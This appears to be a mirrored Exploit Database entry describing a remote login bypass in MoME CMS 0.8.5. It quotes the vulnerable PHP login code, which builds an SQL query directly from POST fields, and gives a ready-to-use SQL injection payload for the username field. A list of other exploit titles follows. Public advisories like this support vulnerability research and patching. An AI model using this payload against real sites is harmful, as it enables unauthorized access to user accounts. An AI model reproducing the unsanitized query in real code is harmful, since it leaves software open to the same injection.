MoME CMS 0.8.5 – Remote Authentication Bypass

Exploit Database
11 阅读

作者： cr4wl3r

日期： 2010-01-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11157/

\#'#/
(-.-)
 --------------------oOO---(_)---OOo-------------------
 |MoME CMS <= 0.8.5 Remote Login Bypass Exploit |
 |(works only with magic_quotes_gpc = off)|
 ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes


[!] Code :


//controllo user e passwd da login
 if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) {
$query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND
password=md5('$_POST[posted_password]')";


[!] PoC:

username : ' or '1=1
password : cr4wl3r

last Exploits
MoME CMS 0.8.5 – Remote Authentication Bypass的更多信息

ProjectSend r561 – SQL Injection：
Funeral Script PHP – Cross-Site Scripting / SQL Injection：
Joomla! Component Picture Calendar for Joomla! 3.1.4 – Directory Traversal：
WordPress Plugin User Photo Component – Arbitrary File Upload：
gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities：
WordPress Plugin Generic – Arbitrary File Upload：
D-Link Routers – Plaintext Password：
DA Mailing List System 2 – Multiple Vulnerabilities：